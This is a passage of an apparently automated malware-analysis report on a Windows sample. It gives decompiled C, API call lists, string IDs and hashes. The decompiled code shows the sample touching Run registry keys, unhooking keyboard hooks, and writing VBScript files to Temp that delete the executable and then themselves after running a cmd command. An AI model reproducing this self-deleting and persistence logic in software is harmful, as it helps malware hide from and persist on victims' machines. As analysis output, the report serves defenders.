                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408056
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408061
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040806C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(WScript.Sleep 1000,?), ref: 0040807E
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject")), ref: 0040808C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?,00415628,0041623C), ref: 004080B0
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ,?,00415628,00000000), ref: 004080C4
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080CF
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004080DC
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080E9
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004080F6
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408102
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040810B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408114
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040811D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408126
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040812F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408138
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 0040814B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,0041BA28,00000000), ref: 00408163
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040816E
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040817B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408188
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408194
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040819D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081A6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081AF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081B8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004081C1
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 004081CF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081DB
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004081E5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004081F1
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040820F
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040821C
                                                                                • exit.MSVCRT ref: 00408228
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408231
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040823A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                                                                • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                • API String ID: 740851534-1662879639
                                                                                • Opcode ID: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                                                                • Instruction ID: 2c5ee03a622c4f430e0af795343514bbf493609e2573cf328c1cc28c00924062
                                                                                • Opcode Fuzzy Hash: 25a4468c4bedb9d25f6c62a780da0af2a7d65bb534f9a9386c322f7da57d4325
                                                                                • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004085AC, Relevance: 138.6, APIs: 63, Strings: 16, Instructions: 308registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 20%
                                                                                			E004085AC(char _a4) {
				signed int _v5;
				char _v6;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				void* _v104;
				void* _v120;
				short _v640;
				void* _t63;
				char* _t65;
				WCHAR* _t68;
				char* _t69;
				char* _t71;
				char* _t74;
				char* _t75;
				char* _t76;
				char* _t77;
				signed int* _t79;
				char* _t80;
				char* _t81;
				signed int _t82;
				short* _t84;
				char* _t85;
				char* _t86;
				WCHAR* _t88;
				char* _t89;
				char* _t90;
				short* _t154;
				void* _t161;
				void* _t162;
				void* _t164;
				void* _t166;

				_t63 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t63 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t63 = E0041050F(_t63);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E00412BEE(_t63);
				}
				_t94 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, _t94, _t63);
					_t161 = _t161 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t63 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t63);
					_t161 = _t161 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 = E0040B692(0x80000001,  &_v640, "exepath",  &_v640, 0x208, _t63, _t63);
				_t162 = _t161 + 0x1c;
				if(_t65 == 0) {
					_t65 = GetModuleFileNameW(0,  &_v640, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t65);
				_v5 = 1;
				_t68 = SetFileAttributesW( &_v640, 0x80);
				if(_t68 == 0) {
					_v5 = _v5 & _t68;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t68 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t68, 0x80);
				}
				_t69 =  &_v6;
				__imp___wgetenv(L"Temp", _t69, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t69);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t69);
				_t71 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t71);
				L0041416A();
				_t164 = _t162 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v40, L"On Error Resume Next\n", _t71);
				if(_v5 != 0) {
					_t88 =  &_v640;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t88,  &_v6, L"\")\n");
					_t89 =  &_v72;
					L0041416A();
					_t90 =  &_v24;
					L00414146();
					_t164 = _t164 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t90, _t90, _t89, _t89, L"while fso.FileExists(\"", _t88);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t154 = L"\"\n";
				_t74 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t74,  &_v640, _t154);
				_t75 =  &_v72;
				L00414146();
				_t76 =  &_v56;
				L00414146();
				_t166 = _t164 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t76, _t76, _t75, _t75, _t74);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t76 != 0) {
					_t85 =  &_v72;
					L0041416A();
					_t86 =  &_v56;
					L00414146();
					_t166 = _t166 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t86, _t86, _t85, _t85, L"fso.DeleteFolder \"", 0x41bc68, _t154);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t77 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t77, "\n");
				_t79 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t79,  &_a4, _t77);
				_t80 =  &_v24;
				L0041414C();
				_t81 =  &_v72;
				L0041414C();
				_t82 =  &_v56;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t82, _t82, _t81, _t81, _t80, _t80, _t79);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t84 = E00412D56( &_v40, _t82 << 1, _t82 << 1, _t82, 0);
				if(_t84 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t84 = ShellExecuteW(0, L"open", _t84, 0x415800, 0x415800, 0);
					if(_t84 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t84;
			}





































                                                                                0x004085b5
                                                                                0x004085c1
                                                                                0x004085c8
                                                                                0x004085c8
                                                                                0x004085d4
                                                                                0x004085d6
                                                                                0x004085d6
                                                                                0x004085e2
                                                                                0x004085e9
                                                                                0x004085f0
                                                                                0x004085f5
                                                                                0x00408605
                                                                                0x0040860f
                                                                                0x00408613
                                                                                0x0040861c
                                                                                0x00408621
                                                                                0x00408621
                                                                                0x0040862b
                                                                                0x0040862f
                                                                                0x0040863c
                                                                                0x00408641
                                                                                0x00408641
                                                                                0x0040864b
                                                                                0x0040864f
                                                                                0x00408660
                                                                                0x00408665
                                                                                0x00408665
                                                                                0x0040866f
                                                                                0x00408678
                                                                                0x00408698
                                                                                0x004086a0
                                                                                0x004086a5
                                                                                0x004086aa
                                                                                0x004086b6
                                                                                0x004086b6
                                                                                0x004086be
                                                                                0x004086c6
                                                                                0x004086df
                                                                                0x004086e3
                                                                                0x004086e7
                                                                                0x004086e9
                                                                                0x004086e9
                                                                                0x004086f7
                                                                                0x00408701
                                                                                0x00408709
                                                                                0x00408710
                                                                                0x00408710
                                                                                0x00408712
                                                                                0x00408720
                                                                                0x0040872b
                                                                                0x00408736
                                                                                0x00408741
                                                                                0x00408747
                                                                                0x00408753
                                                                                0x00408763
                                                                                0x00408768
                                                                                0x0040876e
                                                                                0x00408778
                                                                                0x00408783
                                                                                0x0040878d
                                                                                0x00408794
                                                                                0x0040879d
                                                                                0x004087a6
                                                                                0x004087aa
                                                                                0x004087af
                                                                                0x004087b6
                                                                                0x004087bf
                                                                                0x004087c8
                                                                                0x004087d1
                                                                                0x004087d1
                                                                                0x004087d7
                                                                                0x004087e4
                                                                                0x004087f0
                                                                                0x004087f7
                                                                                0x004087fb
                                                                                0x00408804
                                                                                0x00408808
                                                                                0x0040880d
                                                                                0x00408814
                                                                                0x0040881d
                                                                                0x00408826
                                                                                0x0040882f
                                                                                0x00408839
                                                                                0x00408843
                                                                                0x00408843
                                                                                0x00408850
                                                                                0x0040885a
                                                                                0x0040885e
                                                                                0x00408867
                                                                                0x00408870
                                                                                0x00408874
                                                                                0x00408879
                                                                                0x00408880
                                                                                0x00408889
                                                                                0x00408892
                                                                                0x00408892
                                                                                0x00408898
                                                                                0x004088a9
                                                                                0x004088b4
                                                                                0x004088c0
                                                                                0x004088c7
                                                                                0x004088cb
                                                                                0x004088d4
                                                                                0x004088d8
                                                                                0x004088e1
                                                                                0x004088e5
                                                                                0x004088f1
                                                                                0x004088fa
                                                                                0x00408903
                                                                                0x0040890c
                                                                                0x00408915
                                                                                0x0040891e
                                                                                0x0040892c
                                                                                0x00408938
                                                                                0x00408942
                                                                                0x0040894e
                                                                                0x00408955
                                                                                0x0040895f
                                                                                0x00408967
                                                                                0x00408974
                                                                                0x0040897d
                                                                                0x00408980
                                                                                0x00408980
                                                                                0x0040897d
                                                                                0x00408989
                                                                                0x00408992
                                                                                0x0040899b
                                                                                0x004089a5

                                                                                APIs
                                                                                  • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                                                                  • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004085E9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 00408613
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040862F
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040864F
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000004,0041B310,00000000), ref: 0040866F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00408678
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 00408698
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 004086B6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004086BE
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 004086C6
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                                                                • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                                                                  • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                                                                  • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                                                                  • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                                                                • _wgetenv.MSVCRT ref: 00408720
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                                                                  • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                                                                • exit.MSVCRT ref: 00408980
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
